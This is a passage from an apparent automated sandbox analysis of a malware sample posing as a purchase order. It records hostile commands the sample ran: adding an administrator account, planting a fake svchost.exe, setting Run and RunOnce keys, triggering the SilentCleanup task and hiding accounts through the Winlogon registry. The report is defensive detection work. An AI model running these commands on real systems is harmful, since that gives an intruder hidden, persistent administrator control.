                      Source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: aspnet_regbrowsers.pdbp source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp
                      Source: Binary string: aspnet_regbrowsers.pdbp??? |?_CorExeMainmscoree.dll?% @ source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp
                      Source: Binary string: ???Oy??.pdbError: CoCreateInstance(IID_ISymUnmanagedWriter) returns %X source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
                      Source: Binary string: ComSvcConfig.pdb?x source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp
                      Source: Binary string: aspnet_regbrowsers.pdb source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp
                      Source: Binary string: ilasm.pdb source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
                      Source: Binary string: E:\A\_work\940\s\obj\Editor\IntellisenseDef\Release\net472\Microsoft.VisualStudio.Language.Intellisense.pdb source: svchost.exe, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
                      Source: Binary string: ComSvcConfig.pdb source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Code function: 0_2_00DF9101 push ebx; ret 0_2_00DF9102
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Code function: 0_2_0581060B pushad ; retf 0_2_0581060C
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Code function: 0_2_05812C5E pushfd ; ret 0_2_05812C61
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Code function: 0_2_0581C95B push eax; iretd 0_2_0581C961
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Code function: 32_2_00BF9101 push ebx; ret 32_2_00BF9102
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Code function: 32_2_053F2504 push E802005Eh; ret 32_2_053F2509
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Code function: 32_2_078EF6B8 push eax; retf 32_2_078EF6B9
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Code function: 32_2_078EFC53 push eax; iretd 32_2_078EFC59
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Code function: 36_2_00FB9101 push ebx; ret 36_2_00FB9102
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Code function: 36_2_0878EDE0 push eax; ret 36_2_0878EDE1
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Code function: 36_2_0878EE98 pushfd ; ret 36_2_0878EE99
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Code function: 37_2_058E03EF push E801005Eh; ret 37_2_058E0409
                      Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: 0xAF0CF1CB [Wed Jan 24 10:45:31 2063 UTC]
                      Source: initial sample | Static PE information: section name: .text entropy: 7.93856030024

                      Persistence and Installation Behavior:

                      Adds a new user with administrator rights
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                      Drops executables to the windows directory (C:\Windows) and starts them
                      Source: unknown | Executable created and started: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                      Drops PE files with benign system names
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | File created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe

                      Boot Survival:

                      Creates an autostart registry key pointing to binary in C:\Windows
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECC
                      Creates autostart registry keys with suspicious names
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECC
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECC
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECC

                      Hooking and other Techniques for Hiding and Protection:

                      Contains functionality to hide user accounts
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmp | String found in binary or memory: laREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 3 /t REG_DWORD /d 0
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | String found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp | String found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp | String found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 3 /t REG_DWORD /d 0
                      Source: svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp | String found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 3 /t REG_DWORD /d 0
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | String found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
